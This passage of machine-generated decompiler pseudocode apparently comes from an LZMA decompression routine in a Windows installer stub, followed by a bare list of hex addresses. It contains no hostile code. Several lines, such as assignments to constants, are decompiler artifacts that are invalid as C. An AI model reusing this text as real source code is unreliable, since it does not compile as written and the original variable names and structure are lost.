												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406682
0x00406682
0x00406686
0x004066ab
0x004066b5
0x00000000
0x00406688
0x00406688
0x0040668b
0x0040668f
0x00406692
0x00406695
0x00406699
0x00406699
0x0040669c
0x00406776
0x00406776
0x0040677d
0x0040677d
0x00406780
0x00406787
0x004067b4
0x004067b8
0x00406818
0x0040681b
0x00406820
0x00406821
0x00406823
0x00406825
0x00406828
0x00406734
0x00406734
0x00406734
0x00405ed0
0x00405ed0
0x00405ed0
0x00405ed9
0x00000000
0x00000000
0x00405edf
0x00000000
0x00405eea
0x00000000
0x00000000
0x00405ef3
0x00405ef6
0x00405ef9
0x00405efd
0x00000000
0x00000000
0x00405f03
0x00405f06
0x00405f08
0x00405f09
0x00405f0c
0x00405f0e
0x00405f0f
0x00405f11
0x00405f14
0x00405f19
0x00405f1e
0x00405f27
0x00405f3a
0x00405f3d
0x00405f49
0x00405f71
0x00405f73
0x00405f81
0x00405f81
0x00405f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f75
0x00405f75
0x00405f78
0x00405f79
0x00405f79
0x00000000
0x00405f75
0x00405f4f
0x00405f54
0x00405f54
0x00405f5d
0x00405f65
0x00405f68
0x00000000
0x00405f6e
0x00405f6e
0x00000000
0x00405f6e
0x00000000
0x00405f8b
0x00405f8b
0x00405f8f
0x0040683b
0x00000000
0x0040683b
0x00405f98
0x00405fa8
0x00405fab
0x00405fae
0x00405fae
